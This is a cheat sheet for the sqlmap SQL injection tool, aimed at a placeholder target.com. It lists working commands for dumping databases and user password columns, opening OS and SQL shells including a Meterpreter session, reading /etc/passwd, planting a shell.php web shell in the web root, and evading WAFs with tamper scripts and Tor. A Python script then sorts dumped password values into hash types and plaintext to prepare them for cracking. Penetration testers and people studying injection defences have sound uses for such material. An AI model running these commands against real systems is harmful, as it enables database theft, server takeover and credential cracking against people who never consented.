sqlmap
Automatic SQL injection detection and exploitation tool.
Quickstart
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123"
sqlmap -u "https://target.com/page?id=1" --dump
Core Concepts
| Concept | Description |
|---|---|
| Detection | Find injectable parameters |
| Exploitation | Extract data, get shell |
| Techniques | UNION, blind, time-based, etc. |
| Tamper | Bypass WAF/filters |
Syntax
sqlmap -u <url> [options]
sqlmap -r <request.txt> [options]
Options
Target
| Option | Description |
|---|---|
| -u <url> | Target URL with parameter |
| -r <file> | Load raw HTTP request from file |
| -p <param> | Testable parameter |
| --data <data> | POST data |
| --cookie <c> | Cookie string |
| -H <header> | Extra header |
Detection
| Option | Description |
|---|---|
| --level <1-5> | Test level (default 1); 2+ tests cookies, 3+ tests User-Agent/Referer headers |
| --risk <1-3> | Risk level (default 1); 3 adds OR-based payloads that can modify data if injected into an UPDATE/DELETE |
| --technique <tech> | SQL techniques: B=boolean blind, E=error-based, U=UNION, S=stacked queries, T=time-based blind, Q=inline queries (default BEUSTQ) |
| --dbms <dbms> | Force DBMS type, skipping fingerprinting |
Enumeration
| Option | Description |
|---|---|
| --dbs | List databases |
| --tables | List tables |
| --columns | List columns |
| --dump | Dump table data |
| -D <db> | Target database |
| -T <table> | Target table |
| -C <cols> | Target columns (comma-separated) |
| --dump-all | Dump everything |
Access
| Option | Description |
|---|---|
| --os-shell | Interactive OS shell (needs stacked queries or a writable web root) |
| --os-pwn | Out-of-band shell: Meterpreter or VNC |
| --sql-shell | Interactive SQL shell |
| --file-read <f> | Read file from the DB server filesystem |
| --file-write <f> | Write local file to the DB server (pair with --file-dest) |
Bypass
| Option | Description |
|---|---|
| --tamper <script> | Tamper script(s), comma-separated |
| --random-agent | Random User-Agent header |
| --proxy <url> | Route traffic through a proxy |
| --tor | Use Tor (verify with --check-tor) |
| --skip-waf | Skip heuristic WAF/IPS detection |
General
| Option | Description |
|---|---|
| --threads <n> | Concurrent requests (max 10; no help for time-based blind) |
| --time-sec <sec> | Seconds to wait for a time-based response (default 5) |
| --batch | Non-interactive, accept default answers |
Recipes
Basic Testing
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"
sqlmap -u "https://target.com/page?id=1&name=test" -p id
sqlmap -u "https://target.com/page?id=1" --batch
From Request File
sqlmap -r request.txt
sqlmap -r request.txt -p id
Detection Levels
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/page?id=1" --level 3
sqlmap -u "https://target.com/page?id=1" --level 5 --risk 3
sqlmap -u "https://target.com/page" --level 2 --cookie="id=1"
Database Enumeration
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D database --tables
sqlmap -u "https://target.com/page?id=1" -D database -T users --columns
sqlmap -u "https://target.com/page?id=1" -D database -T users --dump
sqlmap -u "https://target.com/page?id=1" -D database -T users -C "username,password" --dump
Shell Access
sqlmap -u "https://target.com/page?id=1" --sql-shell
sqlmap -u "https://target.com/page?id=1" --os-shell
sqlmap -u "https://target.com/page?id=1" --os-pwn
File Operations
sqlmap -u "https://target.com/page?id=1" --file-read="/etc/passwd"
sqlmap -u "https://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
WAF Bypass
sqlmap -u "https://target.com/page?id=1" --random-agent
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between,randomcase
Specific Techniques
sqlmap -u "https://target.com/page?id=1" --technique=U
sqlmap -u "https://target.com/page?id=1" --technique=T
sqlmap -u "https://target.com/page?id=1" --technique=BEUSTQ
Through Proxy
sqlmap -u "https://target.com/page?id=1" --proxy="http://127.0.0.1:8080"
sqlmap -u "https://target.com/page?id=1" --tor --check-tor
Output & Parsing
sqlmap -u "https://target.com/page?id=1" --dump --output-dir=./results
cat ./results/target.com/dump/database/users.csv
Without --output-dir, dumps land under the default output directory (~/.local/share/sqlmap/output/<host>/ on recent versions, ~/.sqlmap/output/ on older ones); --dump-format switches between CSV (default), HTML and SQLITE.
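Triage of a dumped table usually starts with the credential columns: which rows hold recognisable hashes and which hold plaintext. The following is an added example for this page, not sqlmap code; SAMPLE_CSV is a constructed stand-in for a users.csv dump in the layout sqlmap writes (header line of column names, CSV-quoted values), and the column-name tokens and hash patterns are assumptions. sqlmap itself offers a dictionary attack on recognised hashes while dumping; this script is for the CSV files afterwards.

```python
import csv
import io
import re
from collections import Counter

# Constructed sample in the layout of <output-dir>/target.com/dump/database/users.csv (not a real dump).
SAMPLE_CSV = """id,username,password,email
1,admin,5f4dcc3b5aa765d9d8e3e0b27f1bbbd0,admin@target.com
2,alice,$2b$12$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0,alice@target.com
3,bob,"Pa,ss123",bob@target.com
4,svc_backup,NULL,backup@target.com
5,carol,a94a8fe5ccb19ba61c4c0873d391e987982fbbd3,carol@target.com
"""

# Shape-based recognisers, checked in order (assumed set; extend per target).
HASH_PATTERNS = (
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("md5crypt/sha-crypt", re.compile(r"^\$(?:1|5|6)\$")),
    ("md5-like", re.compile(r"^[0-9a-fA-F]{32}$")),
    ("sha1-like", re.compile(r"^[0-9a-fA-F]{40}$")),
    ("sha256-like", re.compile(r"^[0-9a-fA-F]{64}$")),
)
# Column-name fragments that mark a credential column (assumption).
SECRET_TOKENS = ("pass", "pwd", "hash", "secret")


def classify(value):
    """Name the shape of a stored credential; 'plaintext' is the fallback for anything unrecognised."""
    if value is None or value.strip() == "" or value.strip().upper() == "NULL":
        return "empty"
    for name, pattern in HASH_PATTERNS:
        if pattern.match(value):
            return name
    return "plaintext"


def secret_columns(fieldnames):
    """Columns whose name suggests they hold credentials."""
    return [f for f in fieldnames if any(t in f.lower() for t in SECRET_TOKENS)]


def triage(csv_text):
    """Parse a sqlmap CSV dump and classify every value in credential-looking columns."""
    reader = csv.DictReader(io.StringIO(csv_text))
    cols = secret_columns(reader.fieldnames or [])
    findings = []
    for row in reader:
        for col in cols:
            findings.append({"row": row, "column": col, "kind": classify(row.get(col))})
    return findings


def summary(csv_text):
    """Count of credential values per recognised shape."""
    return Counter(f["kind"] for f in triage(csv_text))


def plaintext_users(csv_text, user_col="username"):
    """Accounts whose credential column holds no recognisable hash, i.e. likely plaintext."""
    return sorted(f["row"][user_col] for f in triage(csv_text) if f["kind"] == "plaintext")


if __name__ == "__main__":
    for kind, count in sorted(summary(SAMPLE_CSV).items()):
        print("%-20s %d" % (kind, count))
    print("plaintext accounts:", plaintext_users(SAMPLE_CSV))
```

Shape matching is only a first cut: a 32-hex value may be MD5, NTLM or a truncated something else, so confirm the algorithm against the application's code or a known account before feeding a cracker.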
Troubleshooting
| Issue | Solution |
|---|---|
| No injection found | Increase --level and --risk (risk 3 can modify data); pin the parameter with -p and the backend with --dbms; load the exact request with -r |
| WAF blocking | Use --tamper, --random-agent; lower --threads and add --delay to avoid rate limiting |
| Slow | Raise --threads (max 10) for non-blind techniques; restrict --technique to what was detected; narrow scope with -p; for time-based blind, keep --time-sec high enough to avoid false negatives |
| False positive | Verify manually; boolean-based detections on pages with dynamic content are the usual cause |
References